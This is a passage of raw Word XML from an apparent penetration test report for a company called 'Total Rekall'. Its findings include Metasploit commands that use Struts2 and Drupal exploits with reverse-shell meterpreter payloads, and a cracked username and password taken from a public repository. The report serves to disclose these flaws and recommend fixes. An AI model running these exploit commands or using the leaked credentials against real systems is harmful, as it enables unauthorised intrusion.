      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The previous nessus scan also revealed a vulnerability to the struts exploit. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Utilizing the following exploits/payloads a shell session was started. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">use /multi/http/struts2_content_type_ognl</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">use payload cmd/linux/http/x64/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set RHOST 192.168.13.12</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set RPORT 8080</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set LHOST 10.0.2.15</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set LPORT 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B6">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2641600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="19"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4657725" cy="2641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B8">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9">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2BA">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BB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Update via vendor instructions </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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BE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 19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B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C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C1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Drupal - CV-2019-6340</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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3">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C4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C6">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">It was found that the address 192.168.13.13 was running Drupal and vulnerable and a remote session was started </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Using metasploit the following was performed:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">use unix/webapp/drupal_restws_unserialize</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">use payload php/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CA">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set RHOST 192.168.13.13</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set RPORT 80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set LHOST 10.0.2.15</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set LPORT 4444</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CE">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C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0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="609600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="41"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46577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2514600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="13"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6577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D7">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8">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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">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DB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Update Drupal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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DE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 20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D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E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E1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Poor File Storage - Repo </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E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3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web App </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E6">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">A copy of the website was stored on the Total Rekall repo which contained an easily cracked account. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">trivera;Tanya4life</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E9">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A">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B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1943100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="4"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4657725" cy="1943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C">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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">https://github.com/totalrekall/site/blob/main/xampp.users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EE">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EF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Don't store the source code and login details to accounts on a repo let alone a public repo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F0">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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F2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 21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F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F4">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F5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">NMAP Scan / Vulnerable Machines </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F6">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS / Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FA">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B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">A nmap scan revealed 2 vulnerable machines on the network;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WinDC01 @172.22.117.10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows10 @172.22.117.20</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Specifically 172.22.117.20:80 which is open to http.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Utilizing the cracked password for trivera it’s possible to login to this address and access unintended files. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
